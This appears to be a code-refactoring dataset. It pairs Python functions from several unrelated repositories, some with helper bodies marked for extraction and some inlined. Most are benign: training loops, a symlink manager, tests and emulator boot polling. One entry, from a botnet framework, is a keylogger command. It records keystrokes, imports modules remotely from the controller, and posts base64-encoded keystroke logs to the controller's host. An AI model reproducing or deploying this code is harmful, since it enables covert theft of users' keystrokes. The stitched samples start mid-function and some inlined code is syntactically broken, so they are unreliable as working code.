(batch_loss_nlg, batch_logits, batch_decode_result, _, _) = self.run_nlg_batch_dual(generated_batch, criterion_nlg, scorer=nlg_scorer_gen, joint_prob_other=nlu_joint_prob if mid_sample_size > 1 else None, teacher_forcing_ratio=teacher_forcing_ratio, max_norm=max_norm, last_reward=last_reward, beam_size=dual_sample_size, supervised=dual_supervised, reinforce=dual_reinforce)
(batch_loss_nlg, batch_loss_nlu) = (batch_loss_nlg.item(), batch_loss_nlu.item())
</DeepExtract>
nlg_loss_gen += batch_loss_nlg
nlu_loss += batch_loss_nlu
batch_amount += 1
pbar.set_postfix(UT='{:.4f}'.format(nlu_loss / batch_amount), UF='{:.4f}'.format(nlu_loss_gen / batch_amount), GT='{:.3f}'.format(nlg_loss / batch_amount), GF='{:.3f}'.format(nlg_loss_gen / batch_amount))
print_time_info('True NLG scores:')
nlg_scorer.print_avg_scores()
print_time_info('Generated NLG scores:')
nlg_scorer_gen.print_avg_scores()
print_time_info('True NLU scores:')
nlu_scorer.print_avg_scores()
print_time_info('Generated NLU scores:')
nlu_scorer_gen.print_avg_scores()
return (nlg_loss / batch_amount, nlg_loss_gen / batch_amount, nlu_loss / batch_amount, nlu_loss_gen / batch_amount, nlg_scorer, nlg_scorer_gen, nlu_scorer, nlu_scorer_gen)
|
def train_joint():
nlg_loss = nlu_loss = 0
nlg_loss_gen = nlu_loss_gen = 0
batch_amount = 0
nlu_scorer = MultilabelScorer(f1_per_sample=self.f1_per_sample)
nlu_scorer_gen = MultilabelScorer(f1_per_sample=self.f1_per_sample)
nlg_scorer = SequenceScorer()
nlg_scorer_gen = SequenceScorer()
criterion_nlg.set_scorer(nlg_scorer)
criterion_nlu.set_scorer(nlu_scorer)
pbar = tqdm(zip(self.train_nlg_data_loader, self.train_nlu_data_loader), total=len(self.train_nlg_data_loader), dynamic_ncols=True)
for (batch_nlg, batch_nlu) in pbar:
criterion_nlg.set_scorer(nlg_scorer)
criterion_nlu.set_scorer(nlu_scorer_gen)
(encoder_input, decoder_label, refs, sf_data) = batch_nlg
self.nlg_batches += 1
(batch_loss_nlg, batch_logits, batch_decode_result, nlg_joint_prob, last_reward) = self.run_nlg_batch(batch_nlg, criterion_nlg, scorer=nlg_scorer, testing=False, teacher_forcing_ratio=teacher_forcing_ratio, max_norm=max_norm, retain_graph=True, optimize=False, beam_size=mid_sample_size, nlg_st=nlg_st, supervised=primal_supervised, reinforce=primal_reinforce)
generated_batch = [batch_decode_result, encoder_input, refs, sf_data]
self.nlu_batches += 1
(batch_loss_nlu, batch_logits, _, _, _) = self.run_nlu_batch_dual(generated_batch, criterion_nlu, scorer=nlu_scorer_gen, joint_prob_other=nlg_joint_prob if mid_sample_size > 1 else None, max_norm=max_norm, last_reward=last_reward, sample_size=dual_sample_size, supervised=dual_supervised, reinforce=dual_reinforce)
(batch_loss_nlg, batch_loss_nlu) = (batch_loss_nlg.item(), batch_loss_nlu.item())
nlg_loss += batch_loss_nlg
nlu_loss_gen += batch_loss_nlu
criterion_nlg.set_scorer(nlg_scorer_gen)
criterion_nlu.set_scorer(nlu_scorer)
(encoder_input, decoder_label, refs, sf_data) = batch_nlu
self.nlu_batches += 1
(batch_loss_nlu, batch_logits, samples, nlu_joint_prob, last_reward) = self.run_nlu_batch(batch_nlu, criterion_nlu, scorer=nlu_scorer, testing=False, max_norm=max_norm, retain_graph=True, optimize=False, sample_size=mid_sample_size, supervised=primal_supervised, reinforce=primal_reinforce)
if nlu_st:
generated_batch = [samples, encoder_input, refs, sf_data]
else:
generated_batch = [self._st_sigmoid(batch_logits, hard=False).unsqueeze(1).expand(-1, mid_sample_size, -1), encoder_input, refs, sf_data]
self.nlg_batches += 1
(batch_loss_nlg, batch_logits, batch_decode_result, _, _) = self.run_nlg_batch_dual(generated_batch, criterion_nlg, scorer=nlg_scorer_gen, joint_prob_other=nlu_joint_prob if mid_sample_size > 1 else None, teacher_forcing_ratio=teacher_forcing_ratio, max_norm=max_norm, last_reward=last_reward, beam_size=dual_sample_size, supervised=dual_supervised, reinforce=dual_reinforce)
(batch_loss_nlg, batch_loss_nlu) = (batch_loss_nlg.item(), batch_loss_nlu.item())
nlg_loss_gen += batch_loss_nlg
nlu_loss += batch_loss_nlu
batch_amount += 1
pbar.set_postfix(UT='{:.4f}'.format(nlu_loss / batch_amount), UF='{:.4f}'.format(nlu_loss_gen / batch_amount), GT='{:.3f}'.format(nlg_loss / batch_amount), GF='{:.3f}'.format(nlg_loss_gen / batch_amount))
print_time_info('True NLG scores:')
nlg_scorer.print_avg_scores()
print_time_info('Generated NLG scores:')
nlg_scorer_gen.print_avg_scores()
print_time_info('True NLU scores:')
nlu_scorer.print_avg_scores()
print_time_info('Generated NLU scores:')
nlu_scorer_gen.print_avg_scores()
return (nlg_loss / batch_amount, nlg_loss_gen / batch_amount, nlu_loss / batch_amount, nlu_loss_gen / batch_amount, nlg_scorer, nlg_scorer_gen, nlu_scorer, nlu_scorer_gen)
|
DuaLUG
|
positive
|
def link_devel_products(logger, event_queue, package, package_path, devel_manifest_path, source_devel_path, dest_devel_path, metadata_path, prebuild):
"""Link files from an isolated devel space into a merged one.
This creates directories and symlinks in a merged devel space to a
package's linked devel space.
"""
mkdir_p(devel_manifest_path)
devel_manifest_file_path = os.path.join(devel_manifest_path, DEVEL_MANIFEST_FILENAME)
products = list()
files_to_clean = []
files_that_collide = []
skiplist = DEVEL_LINK_PREBUILD_SKIPLIST if prebuild else DEVEL_LINK_SKIPLIST
def should_skip_file(filename):
if os.path.relpath(os.path.join(source_path, filename), source_devel_path) in skiplist:
return True
for directory in os.path.relpath(os.path.join(source_path, filename), source_devel_path).split(os.path.sep):
if directory in DEVEL_LINK_SKIP_DIRECTORIES:
return True
return False
for (source_path, dirs, files) in os.walk(source_devel_path):
dest_path = os.path.join(dest_devel_path, os.path.relpath(source_path, source_devel_path))
for dirname in dirs:
if dirname in DEVEL_LINK_SKIP_DIRECTORIES:
continue
source_dir = os.path.join(source_path, dirname)
dest_dir = os.path.join(dest_path, dirname)
if os.path.islink(source_dir):
products.append((source_dir, dest_dir))
if os.path.exists(dest_dir):
if os.path.realpath(dest_dir) != os.path.realpath(source_dir):
files_that_collide.append(dest_dir)
else:
logger.out('Linked: ({}, {})'.format(source_dir, dest_dir))
else:
logger.out('Symlinking %s' % dest_dir)
try:
os.symlink(source_dir, dest_dir)
except OSError:
logger.err('Could not create symlink `{}` referencing `{}`'.format(dest_dir, source_dir))
raise
elif not os.path.exists(dest_dir):
os.mkdir(dest_dir)
elif not os.path.isdir(dest_dir):
logger.err('Error: Cannot create directory: {}'.format(dest_dir))
return -1
for filename in files:
if should_skip_file(filename):
continue
source_file = os.path.join(source_path, filename)
dest_file = os.path.join(dest_path, filename)
products.append((source_file, dest_file))
if os.path.exists(dest_file):
if os.path.realpath(dest_file) != os.path.realpath(source_file):
source_hash = md5(open(os.path.realpath(source_file), 'rb').read()).hexdigest()
dest_hash = md5(open(os.path.realpath(dest_file), 'rb').read()).hexdigest()
if dest_hash != source_hash:
logger.err('Warning: Cannot symlink from %s to existing file %s' % (source_file, dest_file))
logger.err('Warning: Source hash: {}'.format(source_hash))
logger.err('Warning: Dest hash: {}'.format(dest_hash))
files_that_collide.append(dest_file)
else:
logger.out('Linked: ({}, {})'.format(source_file, dest_file))
else:
logger.out('Symlinking %s' % dest_file)
try:
os.symlink(source_file, dest_file)
except OSError:
logger.err('Could not create symlink `{}` referencing `{}`'.format(dest_file, source_file))
raise
if os.path.exists(devel_manifest_file_path):
with open(devel_manifest_file_path, 'r') as devel_manifest:
manifest_reader = csv.reader(devel_manifest, delimiter=' ', quotechar='"')
devel_manifest.readline()
for (source_file, dest_file) in manifest_reader:
if (source_file, dest_file) not in products:
logger.out('Cleaning: (%s, %s)' % (source_file, dest_file))
files_to_clean.append(dest_file)
try:
<DeepExtract>
devel_collisions_file_path = os.path.join(metadata_path, 'devel_collisions.txt')
dest_collisions = dict()
if os.path.exists(devel_collisions_file_path):
with open(devel_collisions_file_path, 'r') as collisions_file:
collisions_reader = csv.reader(collisions_file, delimiter=' ', quotechar='"')
dest_collisions = dict([(path, int(count)) for (path, count) in collisions_reader])
for dest_file in files_that_collide:
if dest_file in dest_collisions:
dest_collisions[dest_file] += 1
else:
dest_collisions[dest_file] = 1
for dest_file in files_to_clean:
n_collisions = dest_collisions.get(dest_file, 0)
if n_collisions == 0:
logger.out('Unlinking: {}'.format(dest_file))
if not False:
if os.path.exists(dest_file):
try:
os.unlink(dest_file)
except OSError:
logger.err('Could not unlink: {}'.format(dest_file))
raise
try:
os.removedirs(os.path.split(dest_file)[0])
except OSError:
pass
else:
logger.out('Already unlinked: {}'.format(dest_file))
if n_collisions > 1:
dest_collisions[dest_file] -= 1
elif n_collisions == 1:
del dest_collisions[dest_file]
if not False:
with open(devel_collisions_file_path, 'w') as collisions_file:
collisions_writer = csv.writer(collisions_file, delimiter=' ', quotechar='"')
for (dest_file, count) in dest_collisions.items():
collisions_writer.writerow([dest_file, count])
</DeepExtract>
except:
logger.err('Could not clean linked files.')
raise
with open(devel_manifest_file_path, 'w') as devel_manifest:
devel_manifest.write('%s\n' % package_path)
manifest_writer = csv.writer(devel_manifest, delimiter=' ', quotechar='"')
for (source_file, dest_file) in products:
manifest_writer.writerow([source_file, dest_file])
return 0
|
def link_devel_products(logger, event_queue, package, package_path, devel_manifest_path, source_devel_path, dest_devel_path, metadata_path, prebuild):
"""Link files from an isolated devel space into a merged one.
This creates directories and symlinks in a merged devel space to a
package's linked devel space.
"""
mkdir_p(devel_manifest_path)
devel_manifest_file_path = os.path.join(devel_manifest_path, DEVEL_MANIFEST_FILENAME)
products = list()
files_to_clean = []
files_that_collide = []
skiplist = DEVEL_LINK_PREBUILD_SKIPLIST if prebuild else DEVEL_LINK_SKIPLIST
def should_skip_file(filename):
if os.path.relpath(os.path.join(source_path, filename), source_devel_path) in skiplist:
return True
for directory in os.path.relpath(os.path.join(source_path, filename), source_devel_path).split(os.path.sep):
if directory in DEVEL_LINK_SKIP_DIRECTORIES:
return True
return False
for (source_path, dirs, files) in os.walk(source_devel_path):
dest_path = os.path.join(dest_devel_path, os.path.relpath(source_path, source_devel_path))
for dirname in dirs:
if dirname in DEVEL_LINK_SKIP_DIRECTORIES:
continue
source_dir = os.path.join(source_path, dirname)
dest_dir = os.path.join(dest_path, dirname)
if os.path.islink(source_dir):
products.append((source_dir, dest_dir))
if os.path.exists(dest_dir):
if os.path.realpath(dest_dir) != os.path.realpath(source_dir):
files_that_collide.append(dest_dir)
else:
logger.out('Linked: ({}, {})'.format(source_dir, dest_dir))
else:
logger.out('Symlinking %s' % dest_dir)
try:
os.symlink(source_dir, dest_dir)
except OSError:
logger.err('Could not create symlink `{}` referencing `{}`'.format(dest_dir, source_dir))
raise
elif not os.path.exists(dest_dir):
os.mkdir(dest_dir)
elif not os.path.isdir(dest_dir):
logger.err('Error: Cannot create directory: {}'.format(dest_dir))
return -1
for filename in files:
if should_skip_file(filename):
continue
source_file = os.path.join(source_path, filename)
dest_file = os.path.join(dest_path, filename)
products.append((source_file, dest_file))
if os.path.exists(dest_file):
if os.path.realpath(dest_file) != os.path.realpath(source_file):
source_hash = md5(open(os.path.realpath(source_file), 'rb').read()).hexdigest()
dest_hash = md5(open(os.path.realpath(dest_file), 'rb').read()).hexdigest()
if dest_hash != source_hash:
logger.err('Warning: Cannot symlink from %s to existing file %s' % (source_file, dest_file))
logger.err('Warning: Source hash: {}'.format(source_hash))
logger.err('Warning: Dest hash: {}'.format(dest_hash))
files_that_collide.append(dest_file)
else:
logger.out('Linked: ({}, {})'.format(source_file, dest_file))
else:
logger.out('Symlinking %s' % dest_file)
try:
os.symlink(source_file, dest_file)
except OSError:
logger.err('Could not create symlink `{}` referencing `{}`'.format(dest_file, source_file))
raise
if os.path.exists(devel_manifest_file_path):
with open(devel_manifest_file_path, 'r') as devel_manifest:
manifest_reader = csv.reader(devel_manifest, delimiter=' ', quotechar='"')
devel_manifest.readline()
for (source_file, dest_file) in manifest_reader:
if (source_file, dest_file) not in products:
logger.out('Cleaning: (%s, %s)' % (source_file, dest_file))
files_to_clean.append(dest_file)
try:
devel_collisions_file_path = os.path.join(metadata_path, 'devel_collisions.txt')
dest_collisions = dict()
if os.path.exists(devel_collisions_file_path):
with open(devel_collisions_file_path, 'r') as collisions_file:
collisions_reader = csv.reader(collisions_file, delimiter=' ', quotechar='"')
dest_collisions = dict([(path, int(count)) for (path, count) in collisions_reader])
for dest_file in files_that_collide:
if dest_file in dest_collisions:
dest_collisions[dest_file] += 1
else:
dest_collisions[dest_file] = 1
for dest_file in files_to_clean:
n_collisions = dest_collisions.get(dest_file, 0)
if n_collisions == 0:
logger.out('Unlinking: {}'.format(dest_file))
if not False:
if os.path.exists(dest_file):
try:
os.unlink(dest_file)
except OSError:
logger.err('Could not unlink: {}'.format(dest_file))
raise
try:
os.removedirs(os.path.split(dest_file)[0])
except OSError:
pass
else:
logger.out('Already unlinked: {}'.format(dest_file))
if n_collisions > 1:
dest_collisions[dest_file] -= 1
elif n_collisions == 1:
del dest_collisions[dest_file]
if not False:
with open(devel_collisions_file_path, 'w') as collisions_file:
collisions_writer = csv.writer(collisions_file, delimiter=' ', quotechar='"')
for (dest_file, count) in dest_collisions.items():
collisions_writer.writerow([dest_file, count])
except:
logger.err('Could not clean linked files.')
raise
with open(devel_manifest_file_path, 'w') as devel_manifest:
devel_manifest.write('%s\n' % package_path)
manifest_writer = csv.writer(devel_manifest, delimiter=' ', quotechar='"')
for (source_file, dest_file) in products:
manifest_writer.writerow([source_file, dest_file])
return 0
|
catkin_tools
|
positive
|
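The collision bookkeeping inlined above is essentially a per-file reference count persisted in a space-delimited CSV: new collisions increment the count, cleanups decrement it, and a file is only unlinked once nothing else provides it. A minimal, hedged sketch of that idea follows; the helper name update_collision_counts and its file layout are illustrative assumptions, not the catkin_tools API.
import csv
import os
def update_collision_counts(collisions_path, colliding, cleaned):
    # Load the existing path -> count table (same CSV dialect as above).
    counts = {}
    if os.path.exists(collisions_path):
        with open(collisions_path, 'r') as f:
            counts = {path: int(n) for path, n in csv.reader(f, delimiter=' ', quotechar='"')}
    # Every newly colliding file gains one more provider.
    for path in colliding:
        counts[path] = counts.get(path, 0) + 1
    # A cleaned file is only safe to unlink once no other package still provides it.
    safe_to_unlink = []
    for path in cleaned:
        n = counts.get(path, 0)
        if n == 0:
            safe_to_unlink.append(path)
        elif n == 1:
            del counts[path]
        else:
            counts[path] = n - 1
    # Persist the updated table for the next invocation.
    with open(collisions_path, 'w') as f:
        writer = csv.writer(f, delimiter=' ', quotechar='"')
        for path, n in counts.items():
            writer.writerow([path, n])
    return safe_to_unlink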
@config(platforms=['win32', 'linux', 'linux2', 'darwin'], command=True, usage='keylogger [mode]')
def keylogger(self, mode=None):
"""
Log user keystrokes
`Required`
:param str mode: run, stop, status, upload
"""
def status():
try:
length = globals()['keylogger'].logs.tell()
return 'Log size: {} bytes'.format(length)
except Exception as e:
<DeepExtract>
logging.basicConfig(level=logging.DEBUG, handlers=[logging.StreamHandler()])
logger = logging.getLogger(__name__)
getattr(logger, level)(str('{} error: {}'.format('keylogger.status', str(e)))) if hasattr(logger, level) else logger.debug(str('{} error: {}'.format('keylogger.status', str(e))))
</DeepExtract>
if 'keylogger' not in globals():
<DeepExtract>
'keylogger' = str('keylogger').split()
if len('keylogger') == 1:
(module, target) = ('keylogger'[0], '')
elif len('keylogger') == 2:
(module, target) = 'keylogger'
else:
return 'usage: {}'.format(self.load.usage)
target = globals()[target].__dict__ if bool(target in globals() and hasattr(target, '__dict__')) else globals()
(host, port) = self.connection.getpeername()
base_url_1 = 'http://{}:{}'.format(host, port + 1)
base_url_2 = 'http://{}:{}'.format(host, port + 2)
with globals()['remote_repo'](self.remote['packages'], base_url_2):
with globals()['remote_repo'](self.remote['modules'], base_url_1):
try:
exec('import {}'.format(module), target)
log('[+] {} remotely imported'.format(module))
return '[+] {} remotely imported'.format(module)
except Exception as e:
log('{} error: {}'.format(self.load.__name__, str(e)))
return '{} error: {}'.format(self.load.__name__, str(e))
</DeepExtract>
if not mode:
if 'keylogger' not in self.handlers:
return globals()['keylogger'].usage
else:
return locals()['status']()
elif 'run' in mode or 'start' in mode:
if 'keylogger' not in self.handlers:
self.handlers['keylogger'] = globals()['keylogger'].run()
return locals()['status']()
else:
return locals()['status']()
elif 'stop' in mode:
try:
<DeepExtract>
try:
if 'keylogger' in self.handlers:
_ = self.handlers.pop('keylogger', None)
del _
return "Job '{}' was stopped.".format('keylogger')
else:
return "Job '{}' not found".format('keylogger')
except Exception as e:
log('{} error: {}'.format(self.stop.__name__, str(e)))
</DeepExtract>
except:
pass
try:
<DeepExtract>
try:
if 'keylogger' in self.handlers:
_ = self.handlers.pop('keylogger', None)
del _
return "Job '{}' was stopped.".format('keylogger')
else:
return "Job '{}' not found".format('keylogger')
except Exception as e:
log('{} error: {}'.format(self.stop.__name__, str(e)))
</DeepExtract>
except:
pass
return locals()['status']()
elif 'upload' in mode:
(host, port) = self.connection.getpeername()
data = base64.b64encode(globals()['keylogger'].logs.getvalue())
json_data = {'data': str(data), 'owner': self.owner, 'type': 'txt', 'module': self.keylogger.__name__, 'session': self.info.get('public_ip')}
globals()['post']('http://{}:{}'.format(host, port + 3), json=json_data)
globals()['keylogger'].logs.reset()
return 'Keystroke log upload complete'
elif 'status' in mode:
return locals()['status']()
else:
return keylogger.usage
|
@config(platforms=['win32', 'linux', 'linux2', 'darwin'], command=True, usage='keylogger [mode]')
def keylogger(self, mode=None):
"""
Log user keystrokes
`Required`
:param str mode: run, stop, status, upload
"""
def status():
try:
length = globals()['keylogger'].logs.tell()
return 'Log size: {} bytes'.format(length)
except Exception as e:
logging.basicConfig(level=logging.DEBUG, handlers=[logging.StreamHandler()])
logger = logging.getLogger(__name__)
getattr(logger, level)(str('{} error: {}'.format('keylogger.status', str(e)))) if hasattr(logger, level) else logger.debug(str('{} error: {}'.format('keylogger.status', str(e))))
if 'keylogger' not in globals():
'keylogger' = str('keylogger').split()
if len('keylogger') == 1:
(module, target) = ('keylogger'[0], '')
elif len('keylogger') == 2:
(module, target) = 'keylogger'
else:
return 'usage: {}'.format(self.load.usage)
target = globals()[target].__dict__ if bool(target in globals() and hasattr(target, '__dict__')) else globals()
(host, port) = self.connection.getpeername()
base_url_1 = 'http://{}:{}'.format(host, port + 1)
base_url_2 = 'http://{}:{}'.format(host, port + 2)
with globals()['remote_repo'](self.remote['packages'], base_url_2):
with globals()['remote_repo'](self.remote['modules'], base_url_1):
try:
exec('import {}'.format(module), target)
log('[+] {} remotely imported'.format(module))
return '[+] {} remotely imported'.format(module)
except Exception as e:
log('{} error: {}'.format(self.load.__name__, str(e)))
return '{} error: {}'.format(self.load.__name__, str(e))
if not mode:
if 'keylogger' not in self.handlers:
return globals()['keylogger'].usage
else:
return locals()['status']()
elif 'run' in mode or 'start' in mode:
if 'keylogger' not in self.handlers:
self.handlers['keylogger'] = globals()['keylogger'].run()
return locals()['status']()
else:
return locals()['status']()
elif 'stop' in mode:
try:
try:
if 'keylogger' in self.handlers:
_ = self.handlers.pop('keylogger', None)
del _
return "Job '{}' was stopped.".format('keylogger')
else:
return "Job '{}' not found".format('keylogger')
except Exception as e:
log('{} error: {}'.format(self.stop.__name__, str(e)))
except:
pass
try:
try:
if 'keylogger' in self.handlers:
_ = self.handlers.pop('keylogger', None)
del _
return "Job '{}' was stopped.".format('keylogger')
else:
return "Job '{}' not found".format('keylogger')
except Exception as e:
log('{} error: {}'.format(self.stop.__name__, str(e)))
except:
pass
return locals()['status']()
elif 'upload' in mode:
(host, port) = self.connection.getpeername()
data = base64.b64encode(globals()['keylogger'].logs.getvalue())
json_data = {'data': str(data), 'owner': self.owner, 'type': 'txt', 'module': self.keylogger.__name__, 'session': self.info.get('public_ip')}
globals()['post']('http://{}:{}'.format(host, port + 3), json=json_data)
globals()['keylogger'].logs.reset()
return 'Keystroke log upload complete'
elif 'status' in mode:
return locals()['status']()
else:
return keylogger.usage
|
byob
|
positive
|
def test__parse_params_and_execute_algorithm(self):
<DeepExtract>
argv_dict = {'--data-directory': data_dir, '--exchanges': 'kraken', '--symbol': 'BTC/USD', '--start-date': '2001'}
argv_dict.update({'--start-balances': '{"okex": {"ETH": 3}, "kraken": {"USD": 100}}', '--exchanges': 'kraken,okex', '--symbols': '', '--start-date': '2019-10-01 10:10', '--end-date': '2019-10-01 10:16', '--algo-bool': True, '--some-string': 'testSTR', '--interval': '2m'})
sys_argv = ['file.py']
for (x, y) in argv_dict.items():
if y is None:
continue
sys_argv.append(x)
if y is not True:
sys_argv.append(y)
sys_argv = sys_argv
</DeepExtract>
with patch.object(sys, 'argv', sys_argv):
with self.assertLogs():
result = parse_params_and_execute_algorithm(TestAlgo)
assert_test_algo_result(self, result, live=True)
self.assertEqual(result.args.algo_bool, True)
self.assertEqual(result.args.some_string, 'testSTR')
self.assertEqual(result.args.live, False)
|
def test__parse_params_and_execute_algorithm(self):
argv_dict = {'--data-directory': data_dir, '--exchanges': 'kraken', '--symbol': 'BTC/USD', '--start-date': '2001'}
argv_dict.update({'--start-balances': '{"okex": {"ETH": 3}, "kraken": {"USD": 100}}', '--exchanges': 'kraken,okex', '--symbols': '', '--start-date': '2019-10-01 10:10', '--end-date': '2019-10-01 10:16', '--algo-bool': True, '--some-string': 'testSTR', '--interval': '2m'})
sys_argv = ['file.py']
for (x, y) in argv_dict.items():
if y is None:
continue
sys_argv.append(x)
if y is not True:
sys_argv.append(y)
sys_argv = sys_argv
with patch.object(sys, 'argv', sys_argv):
with self.assertLogs():
result = parse_params_and_execute_algorithm(TestAlgo)
assert_test_algo_result(self, result, live=True)
self.assertEqual(result.args.algo_bool, True)
self.assertEqual(result.args.some_string, 'testSTR')
self.assertEqual(result.args.live, False)
|
btrccts
|
positive
|
def launch_all_avd_sequentially(self):
for device in self.device_store.get_devices():
if isinstance(device, SessionVirtualDevice) and device.status == 'not-launched':
session_logger.log_device_launch_start_time(device.adb_name)
device.launch()
<DeepExtract>
Printer.system_message(self.TAG, 'Waiting until (' + ' '.join(("'" + device.adb_name + "'" for device in (device,))) + ") devices status will change to '" + 'device' + "'.")
timeout = GlobalConfig.AVD_ADB_BOOT_TIMEOUT
start_time = last_scan_ended = time.time() * 1000
while True:
current_time = time.time() * 1000
if current_time - last_scan_ended >= GlobalConfig.ADB_SCAN_INTERVAL or start_time == last_scan_ended:
Printer.system_message(self.TAG, 'Scanning...')
self.device_store.update_model_statuses()
Printer.system_message(self.TAG, ' * Current wait status:')
for device in (device,):
Printer.system_message(self.TAG, ' ' + device.adb_name + ' ' + Color.GREEN + "('" + device.status + "')")
if all((device.status == 'device' for device in (device,))):
break
last_scan_ended = time.time() * 1000
if current_time - start_time >= timeout:
message = 'Devices took longer than {} seconds to launch (ADB launch). Timeout quit.'
message = message.format(str(timeout))
raise LauncherFlowInterruptedException(self.TAG, message)
Printer.system_message(self.TAG, 'ADB wait finished with success!')
</DeepExtract>
<DeepExtract>
Printer.system_message(self.TAG, "Waiting for 'dev.bootcomplete', 'sys.boot_completed', 'init.svc.bootanim', properties of devices (" + ' '.join(("'" + device.adb_name + "'" for device in self.device_store.get_devices())) + ').')
device_statuses = dict()
for device in self.device_store.get_devices():
device_statuses.update({device.adb_name: None})
start_time = last_scan_ended = time.time() * 1000
while True:
current_time = time.time() * 1000
if current_time - last_scan_ended >= GlobalConfig.ADB_SCAN_INTERVAL or start_time == last_scan_ended:
Printer.system_message(self.TAG, 'Scanning...')
for device in self.device_store.get_devices():
if device in self.device_store.get_devices():
dev_boot = self.adb_shell_controller.get_property(device.adb_name, 'dev.bootcomplete').strip()
sys_boot = self.adb_shell_controller.get_property(device.adb_name, 'sys.boot_completed').strip()
boot_anim = self.adb_shell_controller.get_property(device.adb_name, 'init.svc.bootanim').strip()
boot_finished = dev_boot == '1' and sys_boot == '1' and (boot_anim == 'stopped')
device_statuses.update({device.adb_name: {'dev.bootcomplete': dev_boot, 'sys.boot_completed': sys_boot, 'init.svc.bootanim': boot_anim, 'boot_finished': boot_finished}})
if boot_finished:
session_logger.log_device_launch_end_time(device.adb_name)
Printer.system_message(self.TAG, ' * Current wait status:')
for (device_name, status_dict) in device_statuses.items():
bcplte = str(status_dict['dev.bootcomplete'] if status_dict['dev.bootcomplete'] != '' else '0')
bcplted = str(status_dict['sys.boot_completed'] if status_dict['sys.boot_completed'] != '' else '0')
banim = str(status_dict['init.svc.bootanim'])
launched_status = 'launched' if status_dict['boot_finished'] else 'not-launched'
Printer.system_message(self.TAG, ' ' + device_name + ' properties: ' + "('dev.bootcomplete' : " + bcplte + ', ' + "'sys.boot_completed' : " + bcplted + ', ' + "'init.svc.bootanim' : " + banim + ') - ' + Color.GREEN + launched_status + Color.BLUE)
if all((status_dict['boot_finished'] for status_dict in device_statuses.values())):
break
last_scan_ended = time.time() * 1000
if current_time - start_time >= GlobalConfig.AVD_SYSTEM_BOOT_TIMEOUT:
message = 'Devices took longer than {} seconds to launch (Property launch). Timeout quit.'
message = message.format(str(GlobalConfig.AVD_SYSTEM_BOOT_TIMEOUT))
raise LauncherFlowInterruptedException(self.TAG, message)
Printer.system_message(self.TAG, 'Property launch finished with success!')
</DeepExtract>
|
def launch_all_avd_sequentially(self):
for device in self.device_store.get_devices():
if isinstance(device, SessionVirtualDevice) and device.status == 'not-launched':
session_logger.log_device_launch_start_time(device.adb_name)
device.launch()
Printer.system_message(self.TAG, 'Waiting until (' + ' '.join(("'" + device.adb_name + "'" for device in (device,))) + ") devices status will change to '" + 'device' + "'.")
timeout = GlobalConfig.AVD_ADB_BOOT_TIMEOUT
start_time = last_scan_ended = time.time() * 1000
while True:
current_time = time.time() * 1000
if current_time - last_scan_ended >= GlobalConfig.ADB_SCAN_INTERVAL or start_time == last_scan_ended:
Printer.system_message(self.TAG, 'Scanning...')
self.device_store.update_model_statuses()
Printer.system_message(self.TAG, ' * Current wait status:')
for device in (device,):
Printer.system_message(self.TAG, ' ' + device.adb_name + ' ' + Color.GREEN + "('" + device.status + "')")
if all((device.status == 'device' for device in (device,))):
break
last_scan_ended = time.time() * 1000
if current_time - start_time >= timeout:
message = 'Devices took longer than {} seconds to launch (ADB launch). Timeout quit.'
message = message.format(str(timeout))
raise LauncherFlowInterruptedException(self.TAG, message)
Printer.system_message(self.TAG, 'ADB wait finished with success!')
Printer.system_message(self.TAG, "Waiting for 'dev.bootcomplete', 'sys.boot_completed', 'init.svc.bootanim', properties of devices (" + ' '.join(("'" + device.adb_name + "'" for device in self.device_store.get_devices())) + ').')
device_statuses = dict()
for device in self.device_store.get_devices():
device_statuses.update({device.adb_name: None})
start_time = last_scan_ended = time.time() * 1000
while True:
current_time = time.time() * 1000
if current_time - last_scan_ended >= GlobalConfig.ADB_SCAN_INTERVAL or start_time == last_scan_ended:
Printer.system_message(self.TAG, 'Scanning...')
for device in self.device_store.get_devices():
if device in self.device_store.get_devices():
dev_boot = self.adb_shell_controller.get_property(device.adb_name, 'dev.bootcomplete').strip()
sys_boot = self.adb_shell_controller.get_property(device.adb_name, 'sys.boot_completed').strip()
boot_anim = self.adb_shell_controller.get_property(device.adb_name, 'init.svc.bootanim').strip()
boot_finished = dev_boot == '1' and sys_boot == '1' and (boot_anim == 'stopped')
device_statuses.update({device.adb_name: {'dev.bootcomplete': dev_boot, 'sys.boot_completed': sys_boot, 'init.svc.bootanim': boot_anim, 'boot_finished': boot_finished}})
if boot_finished:
session_logger.log_device_launch_end_time(device.adb_name)
Printer.system_message(self.TAG, ' * Current wait status:')
for (device_name, status_dict) in device_statuses.items():
bcplte = str(status_dict['dev.bootcomplete'] if status_dict['dev.bootcomplete'] != '' else '0')
bcplted = str(status_dict['sys.boot_completed'] if status_dict['sys.boot_completed'] != '' else '0')
banim = str(status_dict['init.svc.bootanim'])
launched_status = 'launched' if status_dict['boot_finished'] else 'not-launched'
Printer.system_message(self.TAG, ' ' + device_name + ' properties: ' + "('dev.bootcomplete' : " + bcplte + ', ' + "'sys.boot_completed' : " + bcplted + ', ' + "'init.svc.bootanim' : " + banim + ') - ' + Color.GREEN + launched_status + Color.BLUE)
if all((status_dict['boot_finished'] for status_dict in device_statuses.values())):
break
last_scan_ended = time.time() * 1000
if current_time - start_time >= GlobalConfig.AVD_SYSTEM_BOOT_TIMEOUT:
message = 'Devices took longer than {} seconds to launch (Property launch). Timeout quit.'
message = message.format(str(GlobalConfig.AVD_SYSTEM_BOOT_TIMEOUT))
raise LauncherFlowInterruptedException(self.TAG, message)
Printer.system_message(self.TAG, 'Property launch finished with success!')
|
AutomationTestSupervisor
|
positive
|
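Both wait loops above poll device state over adb until every emulator reports a finished boot or a timeout expires. A standalone, hedged sketch of that polling pattern using plain subprocess calls; the function name, defaults and error handling here are assumptions for illustration only.
import subprocess
import time
def wait_for_boot(adb_name, timeout_s=300, interval_s=5):
    def getprop(prop):
        # Query one Android system property on the given device.
        result = subprocess.run(['adb', '-s', adb_name, 'shell', 'getprop', prop], capture_output=True, text=True)
        return result.stdout.strip()
    deadline = time.time() + timeout_s
    while time.time() < deadline:
        # Same three properties as the loop above: all must signal a completed boot.
        booted = (getprop('dev.bootcomplete') == '1' and getprop('sys.boot_completed') == '1' and getprop('init.svc.bootanim') == 'stopped')
        if booted:
            return True
        time.sleep(interval_s)
    raise TimeoutError('{} did not finish booting within {} seconds'.format(adb_name, timeout_s))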
def run(dataset_dir):
"""Runs the download and conversion operation.
Args:
dataset_dir: The dataset directory where the dataset is stored.
"""
if not tf.gfile.Exists(dataset_dir):
tf.gfile.MakeDirs(dataset_dir)
<DeepExtract>
training_filename = '%s/mnist_%s.tfrecord' % (dataset_dir, 'train')
</DeepExtract>
